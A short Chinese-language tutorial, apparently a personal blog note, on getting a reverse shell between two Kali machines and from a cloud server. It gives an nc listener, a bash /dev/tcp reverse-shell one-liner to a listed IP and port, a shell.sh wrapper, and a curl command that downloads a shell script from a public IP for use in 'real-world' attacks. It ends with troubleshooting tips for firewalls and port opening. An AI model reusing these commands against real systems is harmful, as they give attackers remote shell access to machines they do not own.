这里只讲实战或真机演练,具体原理网上一搜一大把,自己去看
目录
知识点1:靶机测试 - 双kali
踩坑点:局域网内才稳定
// 第一台kali
nc -lvvp 7777 # 开启监听
// 第二台kali
bash -c "bash -i >& /dev/tcp/192.168.118.129/7777 0>&1" # 反弹shell
知识点2:靶机测试 - 双kali - 脚本反弹
// 新建一个 shell.sh 的可执行文件
bash -c "bash -i >& /dev/tcp/192.168.118.129/7777 0>&1"
// 然后执行这个 shell.sh 文件即可反弹shell
bash shell.sh
知识点3:云服务器反弹(实战常用)
实战之中先探测是否能连接外网,那么就顺便把shell反弹文件下载
// 下载反弹shell文件
curl -o shell.sh http://43.136.101.245:81/shell.sh
然后在云服务器开启监听
// 虚拟机kali执行反弹shell文件
bash shell.sh
这里有个大坑,请看踩坑点2
踩坑点1:需要局域网内才稳定
记得开启局域网
NAT不一定可以,而且多了一行话,相同用户名的情况下还以为失败了
踩坑点2:端口没开放
云服务器永远反弹不成功,云服务器的安全组也全部开放了,但是还是失败
后来才想起,宝塔也有这个功能,要记得去开放一下